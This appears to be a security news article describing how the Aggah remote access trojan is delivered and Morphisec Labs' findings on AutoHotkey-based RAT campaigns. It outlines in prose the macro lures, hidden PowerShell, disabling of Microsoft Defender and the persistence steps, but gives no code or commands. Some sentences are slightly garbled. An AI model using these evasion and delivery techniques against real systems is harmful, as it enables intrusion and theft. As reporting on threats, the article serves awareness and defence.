The Aggah malware is a variant of the Revenge RAT (Remote Access Trojan) that has been used in massive attacks in the Middle East. Computer security researchers have discovered that a previously unknown group made changes to the RevengeRAT source code and used the “haggah” alias in the attacks. Attackers use spam to distribute their and may use emails that look like internal company messages. It appears that the attackers are using filenames that are similar to commonly used names for work documents and are luring users into downloading a macro-enabled Microsoft Word document.
The Aggah RAT (Remote Access Trojan) is delivered as the final payload through a series of scripts. A typical Aggah attack involves at least nine steps, as well as modifying registry values associated with MS Office. Users who open Aggah RAT-related dropper files are warned that they are allowed to download content from remote hosts. This is a trick designed to enable macros and download scripts from the weapons page on the Blogspot platform. The malicious Blogspot page hosts JavaScripts that are downloaded to the user’s computer and run with administrator rights. Attackers manage to disable the native antivirus tool in Windows and disable features in the Microsoft Office suite. The file dropper then runs PowerShell commands through a hidden instance of the Windows PowerShell command line tool. The commands install the Aggah RAT on a local drive and register a scheduled task so that the malware is loaded when Windows boots.
Aggah RAT is a versatile remote access tool that allows attackers to extract files from your PC; delete files on your drives; start / end programs; pull out your web browser bookmarks and saved passwords; take screenshots of the desktop; access to webcam and microphone. You should avoid shady emails and run a security scan every week if you want to reduce your risk of Aggah RAT infection.
Security researchers at Morphisec Labs have uncovered a massive malware campaign that relies on the AutoHotkey (AHK) scripting language to deliver multiple Remote Access Trojans (RATs) to targeted Windows systems. According to Morphisec Labs, from February to May 2021, they detected 4 such cybercriminal campaigns during which Revenge RAT, LimeRAT, AsyncRAT, Houdini and Vjw0rm malware is distributed. “The RAT malware delivery process starts with a script that is compiled by AutoHotkey (AHK). This is a standalone executable containing the AHK interpreter, the AHK script, and any files that the hackers included with the FileInstall command. In this campaign, cybercriminals collect malicious scripts/executables along with a legitimate application to hide their intentions,” Morphisec Labs notes. AutoHotkey is a highly customizable, open source scripting language for Windows that provides the ability to use hotkeys for creating macros and automating software, allowing users to automate repetitive tasks in any Windows application. Infection of a user’s device begins with the AutoHotkey executable, which executes various VBS scripts, which ultimately allows malware to be loaded onto the compromised system. In one cyberattack, identified on March 31, cybercriminals encapsulated RAT malware with an AHK executable file in addition to disabling Microsoft Defender by deploying a batch script and a shortcut (.LNK) file. “ As cybercriminals learn about basic security measures such as emulators, antivirus and UAC, they are looking to create new methods to bypass them ,” Morphisec Labs notes. “The changes in strategy detailed in our report did not affect the effectiveness of these cybercriminal campaigns. The goals remain the same. Most likely, the change in technology was to bypass passive security measures. The common denominator of these ways to evade detection by security tools is the abuse of process memory, since this is usually a static and predictable target for a hacker,” says Morphisec Labs. This is not the first time hackers have misused AutoHotkey to inject malware. In December 2020, Trend Micro discovered a credential stealer program written in the AutoHotkey scripting language that was being distributed to financial institutions in the US and Canada.
